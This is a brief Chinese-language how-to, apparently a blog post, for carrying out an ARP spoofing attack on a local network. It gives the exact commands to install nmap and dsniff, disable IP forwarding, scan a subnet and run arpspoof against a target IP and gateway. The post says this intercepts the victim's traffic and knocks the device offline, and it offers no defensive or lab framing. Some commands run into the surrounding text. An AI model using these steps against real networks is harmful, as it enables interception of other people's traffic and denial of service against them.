一.安装工具
nmap:用来扫描当前局域网的设备
sudo apt instal nmapdsniff工具集
sudo apt install dsniff二.arp攻击
ARP攻击即对目标 ip 冒充网关,目标ip会错误地认为你的机器(运行 arpspoof 的设备)是网关,它发送的所有数据(比如访问网页、微信等)都会被发给你的设备,你可以选择将这些数据丢弃或者继续转发给路由器
1.关闭ubuntu的ip转发
sudo sysctl -w net.ipv4.ip_forward=0sysctl是ubuntu中用于配置或查看内核参数的命令,是临时的,重启后恢复默认值。
-w 代表写入一个新值。
net.ipv4.ip_forward 的参数为 1 时,表示开启对 IPv4 的转发功能,=0时表示不对 IPv4 数据进行转发。
参数net.ipv4.ip_forward在目录/etc/sysctl.conf下,修改该文件可永久修改此参数
2.扫描当前局域网设备
可以先查看自己设备的ipv4地址,注意自己的ipv4地址和网卡名字
ifconfig扫描当前局域网设备
nmap 192.168.31.0-255这里会扫描192.168.31下0-255的设备
3.启动ARP攻击
sudo arpspoof -i <网卡名> -t <目标ip> <网关>比如
sudo arpspoof -i wlp2s0 -t 192.168.31.76 192.168.31.1输入命令后开始截取目标ip到网关的数据,并且不进行转发会导致目标设备断网